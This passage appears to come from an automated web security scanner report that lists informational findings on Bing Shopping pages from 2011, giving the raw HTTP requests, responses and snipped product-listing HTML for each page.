<li><a href="http://go.microsoft.com/fwlink/?LinkId=74170" onmousedown="return si_T('&amp;ID=FD,72.1')">Privacy</a> | </li><li><a href="http://g.redacted/0TO_/enus" onmousedown="return si_T('&amp;ID=FD,74.1')">Legal</a> | </li><li><a href="http://advertising.microsoft.com/advertise-on-bing" onmousedown="return si_T('&amp;ID=FD,76.1')">Advertise</a>
...[SNIP]...
<li><a href="http://g.redacted/AIPRIV/en-us" target="_blank" onmousedown="return si_T('&amp;ID=FD,78.1')">About our ads</a>
...[SNIP]...
<li><a href="http://onlinehelp.microsoft.com/en-US/bing/ff808483.aspx" id="sb_help" target="_blank" onmousedown="return si_T('&amp;ID=FD,80.1')">Help</a>
...[SNIP]...

22.390. http://www.bing.com/shopping/healthy-cooking/r/151

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /shopping/healthy-cooking/r/151

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /shopping/healthy-cooking/r/151?FORM=SHOPH1&crea=012911kitchentools HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 54539
Content-Type: text/html; charset=utf-8
Expires: Sat, 29 Jan 2011 23:53:16 GMT
X-UA-Compatible: IE=7
Date: Sat, 29 Jan 2011 23:53:18 GMT
Connection: close
Set-Cookie: _SS=SID=5EC6D0FB73E14CF2B14310C4952E2ED9; domain=.bing.com; path=/
Set-Cookie: MUID=F741A5D3C8544F77A0B57D8439E7E06E; expires=Mon, 28-Jan-2013 23:53:17 GMT; domain=.bing.com; path=/
Set-Cookie: OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2c71fd68ffb7b94fdeb981a8ac4eea2a2c; expires=Mon, 28-Jan-2013 23:53:17 GMT; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1619993&D=1593447&AF=NOFORM; expires=Mon, 28-Jan-2013 23:53:18 GMT; domain=.bing.com; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:Web=
...[SNIP]...
</script><script type="text/javascript" src="http://Ads1.redacted/library/dap.js"></script>
...[SNIP]...
<li><a href="http://www.redacted/" onmousedown="return si_T('&amp;ID=FD,40.1')">MSN</a></li><li><a href="http://mail.live.com/" onmousedown="return si_T('&amp;ID=FD,42.1')">Hotmail</a>
...[SNIP]...
<li><a href="http://g.live.com/9uxp9en-us/ftr1" onmousedown="return si_T('&amp;ID=FD,53.1')">&#169; 2011 Microsoft</a>
...[SNIP]...
<li><a href="http://go.microsoft.com/fwlink/?LinkId=74170" onmousedown="return si_T('&amp;ID=FD,55.1')">Privacy</a> | </li><li><a href="http://g.redacted/0TO_/enus" onmousedown="return si_T('&amp;ID=FD,57.1')">Legal</a> | </li><li><a href="http://advertising.microsoft.com/advertise-on-bing" onmousedown="return si_T('&amp;ID=FD,59.1')">Advertise</a>
...[SNIP]...
<li><a href="http://g.redacted/AIPRIV/en-us" target="_blank" onmousedown="return si_T('&amp;ID=FD,61.1')">About our ads</a>
...[SNIP]...
<li><a href="http://onlinehelp.microsoft.com/en-us/bing/ff808574.aspx?scrx=1&amp;market=en-US" id="sb_help" target="_blank" onmousedown="return si_T('&amp;ID=FD,63.1')">Help</a> | </li><li><a href="http://feedback.discoverbing.com/default.aspx?productkey=bingshopping" id="sb_feedback" onmousedown="return si_T('&amp;ID=FD,65.1')">Tell us what you think</a>
...[SNIP]...

22.391. http://www.bing.com/shopping/makeup/c/4259

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /shopping/makeup/c/4259

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /shopping/makeup/c/4259?q=MAC+cosmetics&vw=gr&FORM=SHOPH1&crea=012911cosmetics HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Expires: Sun, 30 Jan 2011 17:09:44 GMT
X-UA-Compatible: IE=7
Date: Sun, 30 Jan 2011 17:09:46 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: _SS=SID=C726EB6B9C86452BBDD8A45F549E1925; domain=.bing.com; path=/
Set-Cookie: MUID=F741A5D3C8544F77A0B57D8439E7E06E; expires=Tue, 29-Jan-2013 17:09:45 GMT; domain=.bing.com; path=/
Set-Cookie: OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2c15d6f002248246d583a9b1d2cb6b22c3; expires=Tue, 29-Jan-2013 17:09:45 GMT; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1621029&D=1593447&AF=NOFORM; expires=Tue, 29-Jan-2013 17:09:45 GMT; domain=.bing.com; path=/
Content-Length: 68299

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:Web=
...[SNIP]...
<li><a href="http://www.redacted/" onmousedown="return si_T('&amp;ID=FD,40.1')">MSN</a></li><li><a href="http://mail.live.com/" onmousedown="return si_T('&amp;ID=FD,42.1')">Hotmail</a>
...[SNIP]...
<h3><a href="http://0.r.redacted/?ld=4v-pVHW3X-HHAzjSWf2c0jXUiuZjkC4LqZlrcWOo_fSnpwrR7vod0QVhnEU6sOXmAmIZxRmaTkqhru9CDUmYaIsG2wtFEknlkXawIVK-apwgILAwPDsOvre464ZCwF3chYZ9WoyeVOTr0n1x_UcClBmNAsJo0ArWax0ivsGjadd-eNp0XnwlnaWdVF2qYgc9lwz0LZyE1TyUVd8XfRt5Zokue08o4vcTD3ugNsVj6JsIBGy4grMim7_jQsmuwptCj3M7wPgLiMteWj9D9C5wZWc_MMNjLZpzUt3uta6G7gIT29ptzXTttmcwDyQH6ElO9AkPdKnVmwAW2rpA4X5gVuyU9JcQHwoepIyqtfgNGQcYpHeVebCC6z-AZGxl3ix2EXWHI_k3lau8UF8pyZMaIs7TVUCUyPMZLXL7rKYSan0YShdPSGECZjcz1SMciSwI1G7NCwqiI7b7kZkQjgIdwMi1ncBKIdKZjzPA" onmousedown="return si_T('&amp;ID=FD,62.1,Ads')"><strong>
...[SNIP]...
&amp;msclkid=BBBDEB63BDBD4A6E8DA2353BBCA9DA9C&amp;c=795646&amp;mu=http%3a%2f%2fwww.ecrater.com%2fp%2f10246527%2fmac-cosmetics-pigment-blush-25g" onmousedown="return si_T('&amp;ID=commerce,25.1',this)"><img src="http://a4.bing4.com/thumb/get?bid=LBfijkr%2f7kcKkA&amp;bn=CC&amp;fbid=95xJb3S%2fWTcG0A&amp;fbn=CC" title="Mac Cosmetics Pigment Blush 2,5g Vial Museum Bronze New" alt="Mac Cosmetics Pigment Blush 2,5g Vial Museum Bronze New" width="45" height="100" style="margin-top:32px;" /></a>
...[SNIP]...
;msclkid=BBBDEB63BDBD4A6E8DA2353BBCA9DA9C&amp;c=795646&amp;mu=http%3a%2f%2fwww.ecrater.com%2fp%2f5234356%2fmac-cosmetics-glitter-sample-1-2-tsp" onmousedown="return si_T('&amp;ID=commerce,28.1',this)"><img src="http://a1.bing4.com/thumb/get?bid=DvQHaE80B95yPQ&amp;bn=CC&amp;fbid=95xJb3S%2fWTcG0A&amp;fbn=CC" title="MAC Cosmetics Glitter Sample 1/2 Tsp - Reflects Rust Limited Edition" alt="MAC Cosmetics Glitter Sample 1/2 Tsp - Reflects Rust Limited Edition" width="89" height="100" style="margin-top:32px;" /></a>
...[SNIP]...
lkid=BBBDEB63BDBD4A6E8DA2353BBCA9DA9C&amp;c=796804&amp;mu=http%3a%2f%2fbeautygirl4makeup.com%2fMAC-Cosmetics-Satin-Lipstick-MYTH--P1476936.aspx" onmousedown="return si_T('&amp;ID=commerce,31.1',this)"><img src="http://a2.bing4.com/thumb/get?bid=hWzl%2fEv%2bunl6BA&amp;bn=CC&amp;fbid=95xJb3S%2fWTcG0A&amp;fbn=CC" title="MAC Cosmetics Satin Lipstick MYTH" alt="MAC Cosmetics Satin Lipstick MYTH" width="100" height="100" style="margin-top:32px;" /></a>
...[SNIP]...
BDEB63BDBD4A6E8DA2353BBCA9DA9C&amp;c=796804&amp;mu=http%3a%2f%2fbeautygirl4makeup.com%2fMAC-Cosmetics-Cremesheen-Lipstick-MODESTY--P222394.aspx" onmousedown="return si_T('&amp;ID=commerce,34.1',this)"><img src="http://a3.bing4.com/thumb/get?bid=v7WhxKUwdNrBzQ&amp;bn=CC&amp;fbid=95xJb3S%2fWTcG0A&amp;fbn=CC" title="MAC Cosmetics Cremesheen Lipstick MODESTY" alt="MAC Cosmetics Cremesheen Lipstick MODESTY" width="100" height="97" style="margin-top:34px;" /></a>
...[SNIP]...
kid=BBBDEB63BDBD4A6E8DA2353BBCA9DA9C&amp;c=796804&amp;mu=http%3a%2f%2fbeautygirl4makeup.com%2fMAC-Cosmetics-Satin-Lipstick-MOCHA--P1476946.aspx" onmousedown="return si_T('&amp;ID=commerce,37.1',this)"><img src="http://a4.bing4.com/thumb/get?bid=OeJnbv%2bXJmtPgA&amp;bn=CC&amp;fbid=95xJb3S%2fWTcG0A&amp;fbn=CC" title="MAC Cosmetics Satin Lipstick MOCHA" alt="MAC Cosmetics Satin Lipstick MOCHA" width="98" height="100" style="margin-top:32px;" /></a>
...[SNIP]...
DBD4A6E8DA2353BBCA9DA9C&amp;c=796804&amp;mu=http%3a%2f%2fbeautygirl4makeup.com%2fMAC-Cosmetics-STRANGE-HYBRID-Lipstick-PROPAGATE--P1492127.aspx" onmousedown="return si_T('&amp;ID=commerce,40.1',this)"><img src="http://a1.bing4.com/thumb/get?bid=PikmQecSAVbEfw&amp;bn=CC&amp;fbid=95xJb3S%2fWTcG0A&amp;fbn=CC" title="MAC Cosmetics STRANGE HYBRID Lipstick PROPAGATE" alt="MAC Cosmetics STRANGE HYBRID Lipstick PROPAGATE" width="100" height="87" style="margin-top:39px;" /></a>
...[SNIP]...
;msclkid=BBBDEB63BDBD4A6E8DA2353BBCA9DA9C&amp;c=795646&amp;mu=http%3a%2f%2fwww.ecrater.com%2fp%2f8879189%2fmac-cosmetics-pro-pigment-sample-1-2" onmousedown="return si_T('&amp;ID=commerce,43.1',this)"><img src="http://a2.bing4.com/thumb/get?bid=ng5vIgSQf0dxWA&amp;bn=CC&amp;fbid=95xJb3S%2fWTcG0A&amp;fbn=CC" title="MAC Cosmetics PRO Pigment Sample 1/2 Tsp - Naked Dark" alt="MAC Cosmetics PRO Pigment Sample 1/2 Tsp - Naked Dark" width="78" height="100" style="margin-top:32px;" /></a>
...[SNIP]...
kid=BBBDEB63BDBD4A6E8DA2353BBCA9DA9C&amp;c=796804&amp;mu=http%3a%2f%2fbeautygirl4makeup.com%2fMAC-Cosmetics-Satin-Lipstick-SPIRIT-P1495576.aspx" onmousedown="return si_T('&amp;ID=commerce,46.1',this)"><img src="http://a3.bing4.com/thumb/get?bid=qTebgBKHxdk97A&amp;bn=CC&amp;fbid=95xJb3S%2fWTcG0A&amp;fbn=CC" title="MAC Cosmetics Satin Lipstick SPIRIT" alt="MAC Cosmetics Satin Lipstick SPIRIT" width="100" height="100" style="margin-top:32px;" /></a>
...[SNIP]...
2353BBCA9DA9C&amp;c=796804&amp;mu=http%3a%2f%2fbeautygirl4makeup.com%2fMAC-Cosmetics-Slimshine-Lipstick-Moisturizing-TROPIC-GLOW--P1690977.aspx" onmousedown="return si_T('&amp;ID=commerce,49.1',this)"><img src="http://a4.bing4.com/thumb/get?bid=dE62XCcZUKakGg&amp;bn=CC&amp;fbid=95xJb3S%2fWTcG0A&amp;fbn=CC" title="MAC Cosmetics Slimshine Lipstick Moisturizing TROPIC GLOW" alt="MAC Cosmetics Slimshine Lipstick Moisturizing TROPIC GLOW" width="100" height="93" style="margin-top:36px;" /></a>
...[SNIP]...
lkid=BBBDEB63BDBD4A6E8DA2353BBCA9DA9C&amp;c=796804&amp;mu=http%3a%2f%2fbeautygirl4makeup.com%2fMAC-Cosmetics-Satin-Lipstick-REBEL-P1493406.aspx" onmousedown="return si_T('&amp;ID=commerce,52.1',this)"><img src="http://a1.bing4.com/thumb/get?bid=BoDQeENuUm4Kzw&amp;bn=CC&amp;fbid=95xJb3S%2fWTcG0A&amp;fbn=CC" title="MAC Cosmetics Satin Lipstick REBEL" alt="MAC Cosmetics Satin Lipstick REBEL" width="100" height="98" style="margin-top:33px;" /></a>
...[SNIP]...
lkid=BBBDEB63BDBD4A6E8DA2353BBCA9DA9C&amp;c=796804&amp;mu=http%3a%2f%2fbeautygirl4makeup.com%2fMAC-Cosmetics-Satin-Lipstick-TWIG--P1502946.aspx" onmousedown="return si_T('&amp;ID=commerce,55.1',this)"><img src="http://a2.bing4.com/thumb/get?bid=IIOBHDK6d0R%2bMA&amp;bn=CC&amp;fbid=95xJb3S%2fWTcG0A&amp;fbn=CC" title="MAC Cosmetics Satin Lipstick TWIG" alt="MAC Cosmetics Satin Lipstick TWIG" width="96" height="100" style="margin-top:32px;" /></a>
...[SNIP]...
BBBDEB63BDBD4A6E8DA2353BBCA9DA9C&amp;c=796804&amp;mu=http%3a%2f%2fbeautygirl4makeup.com%2fMAC-Cosmetics-Dazzle-Lipstick-SUPERIOR--P1684997.aspx" onmousedown="return si_T('&amp;ID=commerce,58.1',this)"><img src="http://a3.bing4.com/thumb/get?bid=bt8oRK%2bZJsrvTw&amp;bn=CC&amp;fbid=95xJb3S%2fWTcG0A&amp;fbn=CC" title="MAC Cosmetics Dazzle Lipstick SUPERIOR" alt="MAC Cosmetics Dazzle Lipstick SUPERIOR" width="100" height="96" style="margin-top:34px;" /></a>
...[SNIP]...
clkid=BBBDEB63BDBD4A6E8DA2353BBCA9DA9C&amp;c=796804&amp;mu=http%3a%2f%2fbeautygirl4makeup.com%2fMAC-Cosmetics-Satin-Lipstick-SNOB--P222408.aspx" onmousedown="return si_T('&amp;ID=commerce,61.1',this)"><img src="http://a4.bing4.com/thumb/get?bid=DADVssGCuWYaUA&amp;bn=CC&amp;fbid=95xJb3S%2fWTcG0A&amp;fbn=CC" title="MAC Cosmetics Satin Lipstick SNOB" alt="MAC Cosmetics Satin Lipstick SNOB" width="83" height="100" style="margin-top:32px;" /></a>
...[SNIP]...
BBBDEB63BDBD4A6E8DA2353BBCA9DA9C&amp;c=796804&amp;mu=http%3a%2f%2fbeautygirl4makeup.com%2fMAC-Cosmetics-Lustre-Lipstick-SOPHISTO--P1495858.aspx" onmousedown="return si_T('&amp;ID=commerce,64.1',this)"><img src="http://a1.bing4.com/thumb/get?bid=LOH2QA%2ftpRffPQ&amp;bn=CC&amp;fbid=95xJb3S%2fWTcG0A&amp;fbn=CC" title="MAC Cosmetics Lustre Lipstick SOPHISTO" alt="MAC Cosmetics Lustre Lipstick SOPHISTO" width="100" height="99" style="margin-top:33px;" /></a>
...[SNIP]...
lkid=BBBDEB63BDBD4A6E8DA2353BBCA9DA9C&amp;c=796804&amp;mu=http%3a%2f%2fbeautygirl4makeup.com%2fMAC-Cosmetics-Lipstick-BRICK-O-LA--P1418936.aspx" onmousedown="return si_T('&amp;ID=commerce,67.1',this)"><img src="http://a2.bing4.com/thumb/get?bid=jPjlgXSN3zaw9Q&amp;bn=CC&amp;fbid=95xJb3S%2fWTcG0A&amp;fbn=CC" title="MAC Cosmetics Lipstick BRICK-O-LA" alt="MAC Cosmetics Lipstick BRICK-O-LA" width="99" height="100" style="margin-top:32px;" /></a>
...[SNIP]...
<a href="/shopping/mac-studio-fix-powder-plus-foundation-nc20/p/833F73CCC22FC18F5006?q=MAC+cosmetics&amp;FORM=EGCA15" onmousedown="return si_T('&amp;ID=commerce,70.1',this)"><img src="http://a3.bing4.com/getimage?q=big-CA34CB0E3298E212E7FF97C2635E7526&amp;wf=Comimage" title="MAC Studio Fix Powder Plus Foundation NC20" alt="MAC Studio Fix Powder Plus Foundation NC20" width="125" height="125" style="margin-top:20px;" /></a>
...[SNIP]...
<h3><a href="http://0.r.redacted/?ld=4vEq1DOxCNTgodBnCCN9PUAySR64vGuITELxvcs_yTo45y4ylgr2rq1lxkPSf7WGXnRpOv5AN_Qajv-PHCd_5ICJvWd3Z1WJ5wfY4pjAWOHpvNScraml8jk1Av4p1sfKcvy2G1x7s1iyy4duaWgjwx_mXCCQNZJrsOn3RmwU6BxJmL_z-et1uGujTVCO1noaUHRmokQhH1GNlobeuEUlkjLDiFESeM9txQpGK6juoH6l9iLcVYmbIFRujBvEm6rOz3TZJLIAeWRA49u4yEkwm0W95bfI-Q_HRkYGM9PvkfiFXtdFvralNsqPf6GcjthT8ZNVQJTCMDjqkIonP-9kNcCIQ5bEUQJmNzPYsqJ2mxhhsTlqHQwvkRXK1M5Vy4-BobV9sCDPmuJiae" onmousedown="return si_T('&amp;ID=FD,58.1,Ads')">Dillard's - Official Site</a>
...[SNIP]...
<h3><a href="http://0.r.redacted/?ld=4vGAL1SBCEdXzhb7_ep95MdPncmpfA2k6Eij6vSi3LcXkmFDUBYmOhOz3oOKaqlul4TWYGiqJVOsqlF91hOIQuzTfW9aOu9uWHFodunSQJm2D9mzCoOeR3kP7QEJX_9A7g5ApAnmOTfeYcuyGjZP_rojRwPyAywpOVJhejnobbYbemg0-QniME48PYSdi5A5Bdy9t_l9StTFLAy4xDznfnih9xGvNpMcNQiqwH3TwSHsBu7qQKzXuG8KqiTYpkAYjJgUmKr2qu29vS9IWGnrFDyWItqwrgA0vlz8YQxQYR-hg1VAlMIC1RchNWR6aL_dsgj9gSpRAmY3M9CaLvCTssDq1FWZRAkpGUXlGYhfw---32OKTaNoNhpcQ" onmousedown="return si_T('&amp;ID=FD,60.1,Ads')"><strong>
...[SNIP]...
<div><a href="http://advertising.microsoft.com/search/" class="sb_adMktA" onmousedown="return si_T('&amp;ID=FD,56.1,Ads')">See your message here</a>
...[SNIP]...
<li><a href="http://g.live.com/9uxp9en-us/ftr1" onmousedown="return si_T('&amp;ID=FD,157.1')">&#169; 2011 Microsoft</a>
...[SNIP]...
<li><a href="http://go.microsoft.com/fwlink/?LinkId=74170" onmousedown="return si_T('&amp;ID=FD,159.1')">Privacy</a> | </li><li><a href="http://g.redacted/0TO_/enus" onmousedown="return si_T('&amp;ID=FD,161.1')">Legal</a> | </li><li><a href="http://advertising.microsoft.com/advertise-on-bing" onmousedown="return si_T('&amp;ID=FD,163.1')">Advertise</a>
...[SNIP]...
<li><a href="http://g.redacted/AIPRIV/en-us" target="_blank" onmousedown="return si_T('&amp;ID=FD,165.1')">About our ads</a>
...[SNIP]...
<li><a href="http://onlinehelp.microsoft.com/en-us/bing/ff808574.aspx?scrx=1&amp;market=en-US" id="sb_help" target="_blank" onmousedown="return si_T('&amp;ID=FD,167.1')">Help</a> | </li><li><a href="https://feedback.discoverbing.com/default.aspx?locale=en-US&amp;productkey=bingshopping&amp;P1=dsatcommerce&amp;P2=MAC%20cosmetics&amp;P3=0&amp;P4=SHOPH1&amp;P5=f741a5d3-c854-4f77-a0b5-7d8439e7e06e&amp;P6=&amp;P7=Original&amp;P8=&amp;P9=0.0/0.0&amp;P10=0.0&amp;P11=http%3a%2f%2fwww.bing.com%3a80%2fshopping%2fmakeup%2fc%2f4259%3fq%3dMAC%2bcosmetics%26vw%3dgr%26FORM%3dSHOPH1%26crea%3d012911cosmetics&amp;P12=&amp;searchtype=Commerce+Answer&amp;optl1=1&amp;backurl=http%3a%2f%2fwww.bing.com%2fshopping%2fmakeup%2fc%2f4259%3fq%3dMAC%2520cosmetics%26FORM%3dFEEDTU" id="sb_feedback" onmousedown="return si_T('&amp;ID=FD,169.1')">Tell us what you think</a>
...[SNIP]...

22.392. http://www.bing.com/shopping/swimwear/c/4503

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /shopping/swimwear/c/4503

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /shopping/swimwear/c/4503?q=plus-size+swimwear&FORM=SHOPH1&crea=012911swimwear HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Expires: Sun, 30 Jan 2011 17:09:33 GMT
X-UA-Compatible: IE=7
Date: Sun, 30 Jan 2011 17:09:35 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: _SS=SID=A0A0DF4581144706A193D88904DFBDB3; domain=.bing.com; path=/
Set-Cookie: MUID=F741A5D3C8544F77A0B57D8439E7E06E; expires=Tue, 29-Jan-2013 17:09:34 GMT; domain=.bing.com; path=/
Set-Cookie: OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2c8373d67c66ef4e8a8f8b648f98d98aeb; expires=Tue, 29-Jan-2013 17:09:34 GMT; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1621029&D=1593447&AF=NOFORM; expires=Tue, 29-Jan-2013 17:09:34 GMT; domain=.bing.com; path=/
Content-Length: 87142

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:Web=
...[SNIP]...
<li><a href="http://www.redacted/" onmousedown="return si_T('&amp;ID=FD,40.1')">MSN</a></li><li><a href="http://mail.live.com/" onmousedown="return si_T('&amp;ID=FD,42.1')">Hotmail</a>
...[SNIP]...
ef="/shopping/plus-size-swimwear-longitude-fanclub-plus-size-tank-one-piece-swimsuit/p/A2E06820B761A4C55002?q=plus-size+swimwear&amp;FORM=EGCA0" onmousedown="return si_T('&amp;ID=commerce,63.1',this)"><img src="http://a4.bing4.com/getimage?q=big-C35C4DE27B8D720012EB933E790E169E&amp;wf=Comimage" title="Plus Size Swimwear Longitude Fanclub Plus Size Tank One Piece Swimsuit" alt="Plus Size Swimwear Longitude Fanclub Plus Size Tank One Piece Swimsuit" width="125" height="125" style="margin-top:20px;" /></a>
...[SNIP]...
<a href="/shopping/speedo-womens-vanquisher-ultraback-endurance-plus-size-swimsuit/p/3EC54BD2D71C16C97516?q=plus-size+swimwear&amp;FORM=EGCA1" onmousedown="return si_T('&amp;ID=commerce,66.1',this)"><img src="http://a1.bing4.com/getimage?q=big-2A0EDE17A519915359CDC2AAE21A694E&amp;wf=Comimage" title="Speedo Womens Vanquisher Ultraback Endurance Plus Size Swimsuit" alt="Speedo Womens Vanquisher Ultraback Endurance Plus Size Swimsuit" width="125" height="125" style="margin-top:20px;" /></a>
...[SNIP]...
<a href="/shopping/plus-size-swimsuit-speedo-chlorine-proof-shirred-plus-size/p/4A7CC3598A98A952B762?q=plus-size+swimwear&amp;FORM=EGCA2" onmousedown="return si_T('&amp;ID=commerce,69.1',this)"><img src="http://a2.bing4.com/getimage?q=big-D8A33F77FF3E896265CD9C5A085136CC&amp;wf=Comimage" title="Plus Size Swimsuit Speedo .. Chlorine Proof Shirred Plus Size ..." alt="Plus Size Swimsuit Speedo .. Chlorine Proof Shirred Plus Size ..." width="102" height="160" style="margin-top:2px;" /></a>
...[SNIP]...
<a href="/shopping/plus-size-solitaire-escape-womens-swimwear/p/32AFAC20BC03566F5002?q=plus-size+swimwear&amp;FORM=EGCA3" onmousedown="return si_T('&amp;ID=commerce,72.1',this)"><img src="http://a3.bing4.com/getimage?q=big-B10ED715112896841CC07E8DA6AF6B68&amp;wf=Comimage" title="Plus Size Solitaire Escape Womens Swimwear" alt="Plus Size Solitaire Escape Womens Swimwear" width="125" height="125" style="margin-top:20px;" /></a>
...[SNIP]...
<a href="/shopping/woman-within-plus-size-swimskirt-swimwear-by-swim-365/p/73D72458CFCCD74D5006?q=plus-size+swimwear&amp;FORM=EGCA4" onmousedown="return si_T('&amp;ID=commerce,75.1',this)"><img src="http://a4.bing4.com/getimage?q=big-8FCB8BFA76B9D75977724265755D4C2C&amp;wf=Comimage" title="Woman Within Plus Size Swimskirt swimwear by Swim 365" alt="Woman Within Plus Size Swimskirt swimwear by Swim 365" width="111" height="160" style="margin-top:2px;" /></a>
...[SNIP]...
<a href="/shopping/longitude-ombre-stripe-plus-size-one-piece-swimsuit/p/DF2EBC4C6785FE7D5006?q=plus-size+swimwear&amp;FORM=EGCA5" onmousedown="return si_T('&amp;ID=commerce,78.1',this)"><img src="http://a1.bing4.com/getimage?q=big-06B92552D061BB5D621EC181A9A06634&amp;wf=Comimage" title="Longitude Ombre Stripe Plus Size One Piece Swimsuit" alt="Longitude Ombre Stripe Plus Size One Piece Swimsuit" width="101" height="160" style="margin-top:2px;" /></a>
...[SNIP]...
<a href="/shopping/woman-within-plus-size-mix-match-swimsuit-briefs-swimwear/p/20F2BF3C1B0118425006?q=plus-size+swimwear&amp;FORM=EGCA6" onmousedown="return si_T('&amp;ID=commerce,81.1',this)"><img src="http://a2.bing4.com/getimage?q=big-72A8FD1A31669793B964EC76F05D5E67&amp;wf=Comimage" title="Woman Within Plus Size mix &amp; match swimsuit briefs swimwear ..." alt="Woman Within Plus Size mix &amp; match swimsuit briefs swimwear ..." width="111" height="160" style="margin-top:2px;" /></a>
...[SNIP]...
<a href="/shopping/woman-within-plus-size-2-piece-swimsuit-by-sunbird/p/CA5033BD286C5E3A5006?q=plus-size+swimwear&amp;FORM=EGCA7" onmousedown="return si_T('&amp;ID=commerce,84.1',this)"><img src="http://a3.bing4.com/getimage?q=big-6758BD0CE894E8A0275D9EAA59746B16&amp;wf=Comimage" title="Woman Within Plus Size 2-piece swimsuit by Sunbird" alt="Woman Within Plus Size 2-piece swimsuit by Sunbird" width="111" height="160" style="margin-top:2px;" /></a>
...[SNIP]...
<a href="/shopping/woman-within-plus-size-1-piece-swimsuit-by-swim365/p/EDFAA4CAAA6FBEF45006?q=plus-size+swimwear&amp;FORM=EGCA8" onmousedown="return si_T('&amp;ID=commerce,87.1',this)"><img src="http://a4.bing4.com/getimage?q=big-FB60916598347F38D1CCEABDECD07FEB&amp;wf=Comimage" title="Woman Within Plus Size 1-piece swimsuit by Swim365" alt="Woman Within Plus Size 1-piece swimsuit by Swim365" width="111" height="160" style="margin-top:2px;" /></a>
...[SNIP]...
<a href="/shopping/woman-within-plus-size-solid-swimsuit-by-contour-by-beach-scene/p/A8BCEBACECE4E0835006?q=plus-size+swimwear&amp;FORM=EGCA9" onmousedown="return si_T('&amp;ID=commerce,90.1',this)"><img src="http://a1.bing4.com/getimage?q=big-33C07C4048E2F323465972AE39F6F902&amp;wf=Comimage" title="Woman Within Plus Size solid swimsuit by Contour by Beach Scene" alt="Woman Within Plus Size solid swimsuit by Contour by Beach Scene" width="111" height="160" style="margin-top:2px;" /></a>
...[SNIP]...
<a href="/shopping/longitude-ambrosia-plus-size-surplice-one-piece-swimsuit/p/8B3D1D0CDD473EFA5006?q=plus-size+swimwear&amp;FORM=EGCA10" onmousedown="return si_T('&amp;ID=commerce,93.1',this)"><img src="http://a2.bing4.com/getimage?q=big-91A826474D5FD84CF0D3C5E957831926&amp;wf=Comimage" title="Longitude Ambrosia Plus Size Surplice One Piece Swimsuit" alt="Longitude Ambrosia Plus Size Surplice One Piece Swimsuit" width="101" height="160" style="margin-top:2px;" /></a>
...[SNIP]...
